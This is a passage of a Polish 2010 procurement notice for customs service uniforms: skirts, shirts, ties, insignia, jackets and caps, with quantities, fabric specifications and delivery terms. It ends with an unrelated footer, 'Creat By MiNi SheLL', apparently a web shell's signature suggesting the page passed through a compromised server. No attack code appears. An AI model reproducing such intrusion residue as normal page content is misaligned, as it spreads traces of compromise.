Spódnice damskie	szt.	116;
Kamizelki dla funkcjonariusza kobiety 	szt.	116;

Zamawiający w celu realizacji zamówienia powierzy Wykonawcy materiał - gabardynę. 
Pozostałe dodatki krawieckie konieczne do uszycia zapewni Wykonawca.

Wraz z umową na szycie, Zamawiający przekaże Wykonawcy listę osób, dla których zostanie uszyte umundurowanie. 
Pobieranie miary niezbędnej do uszycia poszczególnych składników umundurowania, odbywać się będzie w punktach wskazanych przez Zamawiającego, zlokalizowanych we Wrocławiu, Legnicy, Wałbrzychu, Jeleniej Górze, Żarskiej Wsi oraz Polkowicach. Wykonawca zobowiązuje się do min. dwóch przymiarek w miejscach i terminach uzgodnionych z Zamawiającym po podpisaniu umowy. 
Osoby, dla których będzie szyte umundurowanie, będą się zgłaszać, ze Zleceniem szycia do pobrania miary w terminach i miejscach uzgodnionych z Wykonawcą.
Wykonanie przedmiotu zamówienia nastąpi w terminie do 30.08.2010r. 
Odbiór sortów mundurowych następować będzie osobiście przez użytkownika poprzez podpisanie protokołu odbioru,  po stwierdzeniu przez użytkownika, iż sort jest dopasowany do sylwetki.
Zamówienie musi być wykonane zgodnie ze sztuką krawiecką, z należytą starannością, przez co należy rozumieć: trwałość, estetykę, odpowiednie dopasowanie ubioru do sylwetki. Użyte dodatki krawieckie muszą charakteryzować się trwałością i niezawodnością.
Wykonawca udzieli 12 miesięcznej gwarancji na uszyte składniki umundurowania liczonej od dnia protokolarnego odbioru sortu przez użytkownika.
W okresie gwarancji, wykonawca zobowiązany jest do usunięcia zgłoszonych wad fizycznych  na własny koszt, w terminie nie przekraczającym 21 dni od dnia zgłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.39.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa koszul służbowych oraz krawatów zamiennie krawatek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa koszul służbowych oraz krawatów zamiennie krawatek.
Przedmiotem zamówienia jest dostawa koszul służbowych z długim i krótkim rękawem, w kolorze białym i miętowym oraz krawatów/krawatek w następujących ilościach:
Koszule w kolorze białym z krótkim rękawem  damskie	szt.	116;
Koszule w kolorze białym z długim rękawem damskie	szt.	116;
Koszule w kolorze miętowym z krótkim rękawem damskie	szt.	183;
Koszule w kolorze miętowym z długim rękawem damskie	szt.	183;
Koszule w kolorze białym z krótkim rękawem męskie	szt.	134;
Koszule w kolorze białym z długim rękawem męskie	szt.	134;
Koszule w kolorze miętowym z krótkim rękawem męskie	szt.	204;
Koszule w kolorze miętowym z długim rękawem męskie	szt.	204;
Krawaty 	szt.	134;
Krawatki	szt.	116.
	
Wykonawca do wykonania zamówienia użyje własnych materiałów zgodnie z charakterystyką materiałową:
Krawat -zamiennie krawatka 	Kolor tkaniny ciemnozielony, określony metodą CIE L*a*b: L*29.37;a*-4,66; b*-7,75, 
E   1 
Poliester 100 %, gładki 
Koszula w kolorze miętowym z długim i krótkim rękawem	Kolor tkaniny miętowy, określony metodą CIE L*a*b: L*60.91;a*-8,35; b*-3,45, E  1 bawełna: min. 55 %  
gramatura 120 g/m2 +/- 6 g/m2
kolor guzików: miętowy 
Koszula w kolorze białym z długim i krótkim rękawem	Bawełna: min. 55 %  
Gramatura 120 g/m2 +/- 6 g/m2
Wraz z umową na dostawę koszul Zamawiający przekaże Wykonawcy rozmiary niezbędne do uszycia koszul.
Po podpisaniu umowy Wykonawca wykona i dostarczy do Zamawiającego w terminie uzgodnionym przez obie strony, po jednej koszuli z każdego rodzaju dla wyznaczonego przez Zamawiającego pracownika oraz krawata i krawatki, celem oceny zgodności ich wykonania.
Po stwierdzeniu przez Zamawiającego, iż dostarczone koszule oraz krawaty i krawatki zostały wykonane zgodnie z wymogami określonymi w Rozporządzeniem Ministra Finansów z dnia 23 listopada 2009 roku w sprawie umundurowania funkcjonariuszy celnych (Dz. U. z 2009r. nr 197, poz. 1521) Wykonawca przystąpi do dalszej realizacji zamówienia.
Wykonawca dostarczy przedmiotowe koszule oraz krawaty/krawatki w terminie do 30.08.2010r.  
Dostawa koszul oraz krawatów/krawatek obejmować będzie ich przywóz oraz wniesienie do magazynu Zamawiającego mieszczącego się w jego siedzibie przy ul. Karmelkowej 31 we Wrocławiu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.39.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa emblematów Służba Celna, sznurów galowych, czarnych dystynkcji do ubioru specjalnego, dystynkcji - do ubioru służbowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa emblematów Służba Celna, sznurów galowych, czarnych dystynkcji do ubioru specjalnego, dystynkcji - do ubioru służbowego  oraz dystynkcji.
przedmiotem zamówienia jest dostawa emblematów Służba Celna, sznurów galowych, czarnych dystynkcji do ubioru specjalnego, dystynkcji - do ubioru służbowego w następujących ilościach: 
Emblemat Służba Celna  	szt.	500;
Sznur galowy 	szt.	250;
Dystynkcje czarne  do ubioru specjalnego 	kpl. 	162; 
Dystynkcje - do ubioru służbowego  	kpl.	1100 wykonanych zgodnie z Rozporządzeniem Ministra Finansów z dnia 23 listopada 2009 roku w sprawie umundurowania funkcjonariuszy celnych (Dz. U. z 2009r. nr 197, poz. 1521) oraz 
Dystynkcje (patki)	kpl.	944 wykonane zgodnie z Rozporządzeniem Ministra Finansów z dnia 20 maja 2000r. w sprawie umundurowania funkcjonariuszy celnych (Dz. U. z 2000r. nr 41 poz. 479).



Wykonawca do wykonania zamówienia użyje własnych materiałów zgodnie z charakterystyką materiałową:
Sznur galowy 	W kolorze srebrnym, wykonany w 100 % z przędzy poliestrowej 
Dystynkcje ubioru służbowego	Kolor tkaniny szarozielony, gabardyna: 45% wełna, 55% PE
Dystynkcje ubioru specjalnego	Kolor tkaniny czarny, gabardyna: 45 % wełna, 55 % PE 
Dystynkcje*	Kolor tkaniny szarozielony, gabardyna: 45% wełna, 55% PE


Po podpisaniu umowy Wykonawca wykona i dostarczy do Zamawiającego w terminie uzgodnionym przez obie strony, jednego emblematu Służba Celna, sznura galowego, czarnej dystynkcji do ubioru specjalnego, dystynkcji - do ubioru służbowego oraz dystynkcji (patek) celem oceny zgodności ich wykonania z wymogami zamówienia.
Po stwierdzeniu przez Zamawiającego, iż dostarczony asortyment został wykonany zgodnie z w/w  Rozporządzeniami. Wykonawca przystąpi do dalszej realizacji zamówienia.
Wykonawca dostarczy przedmiotowy asortyment w terminie do 30.08.2010r. 
Dostawa obejmować będzie przywóz oraz wniesienie przedmiotu zamówienia do magazynu Zamawiającego mieszczącego się w jego siedzibie przy ul. Karmelkowej 31 we Wrocławiu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.39.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa kurtek damskich z podpinką oraz bezrękawnikiem, kurtek męskich z podpinką oraz bezrękawnikiem, swetrów typu polar z obszyciami oraz szalów polarowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa kurtek damskich z podpinką oraz bezrękawnikiem, kurtek męskich z podpinką oraz bezrękawnikiem, swetrów typu polar z obszyciami oraz szalów polarowych
w następujących ilościach:

Kurtka z odpinaną podpinką oraz  bezrękawnikiem damska 	szt.	116;
Kurtka z odpinaną podpinką oraz bezrękawnikiem męska 	szt.	134;
Sweter typu polar z obszyciami 	szt.	250;
Szal polarowy 	szt. 	250;

Wykonawca do wykonania zamówienia użyje własnych materiałów zgodnie z charakterystyką materiałową:
Kurtka 	Kurtka z odpinaną podpinką oraz bezrękawnikiem. 


Wraz z umową na dostawę kurtek damskich z podpinką oraz bezrękawnikiem, kurtek męskich z podpinką oraz bezrękawnikiem, swetrów typu polar z obszyciami Zamawiający przekaże Wykonawcy rozmiary niezbędne do wykonania zamówienia.
Po podpisaniu umowy Wykonawca wykona i dostarczy do Zamawiającego w terminie uzgodnionym przez obie strony, jedną: kurtkę damską z podpinką oraz bezrękawnikiem, kurtkę męską z podpinką oraz bezrękawnikiem, sweter typu polar z obszyciami oraz szal polarowy, celem oceny zgodności wykonania zamówienia.
Po stwierdzeniu przez Zamawiającego, iż dostarczony asortyment został wykonany zgodnie z  Rozporządzeniem.  Wykonawca przystąpi do dalszej realizacji zamówienia.
Wykonawca dostarczy przedmiot zamówienia w terminie do 30.08.2010r.  
Dostawa przedmiotu zamówienia obejmować będzie przywóz oraz wniesienie do magazynu Zamawiającego mieszczącego się w jego siedzibie przy ul. Karmelkowej 31 we Wrocławiu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.39.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa kapelusików oraz czapek służbowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa kapelusików oraz czapek służbowych
w następujących ilościach:
Kapelusik 	szt.	116;
Czapka służbowa 	szt.	134. Wykonawca do wykonania kapelusików użyje własnych materiałów, natomiast na wykonanie czapek służbowych materiał - gabardynę powierzy Zamawiający. 
Pozostałe dodatki krawieckie konieczne do uszycia zapewni Wykonawca.



Wraz z umową na dostawę kapelusików oraz czapek służbowych Zamawiający przekaże Wykonawcy rozmiary niezbędne do wykonania kapelusików oraz czapek służbowych.
Po podpisaniu umowy Wykonawca wykona i dostarczy do Zamawiającego w terminie uzgodnionym przez obie strony, jeden kapelusik oraz jedną czapkę służbową, celem oceny zgodności wykonania zmówienia.
Po stwierdzeniu przez Zamawiającego, iż dostarczony asortyment został wykonany zgodnie z Rozporządzeniem  Wykonawca przystąpi do dalszej realizacji zamówienia.
Wykonawca dostarczy przedmiotowe kapelusiki oraz czapki służbowe w terminie do 30.08.2010r.  
Dostawa czapek służbowych oraz kapelusików obejmować będzie ich przywóz oraz wniesienie do magazynu Zamawiającego mieszczącego się w jego siedzibie przy ul. Karmelkowej 31 we Wrocławiu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.39.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com